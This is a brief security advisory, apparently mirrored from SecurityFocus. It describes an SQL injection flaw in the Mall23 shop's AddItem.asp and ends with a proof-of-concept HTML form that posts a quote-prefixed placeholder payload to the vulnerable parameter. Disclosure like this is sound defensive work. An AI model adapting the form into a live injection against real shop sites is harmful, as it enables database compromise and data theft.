10 lines
No EOL
638 B
Text
10 lines
No EOL
638 B
Text
source: https://www.securityfocus.com/bid/14898/info
|
|
|
|
Mall23 is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before using it in an SQL query.
|
|
|
|
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
|
|
|
|
<form action="http://www.example.com/m23Basket/AddItem.asp?idProduct=6" method="POST">
|
|
<input type="hidden" name="idOption_Dropdown_2" value="'[SQL INJECTION]">
|
|
<input type="Submit" name="submit" value="Test Exploit">
|
|
</form> |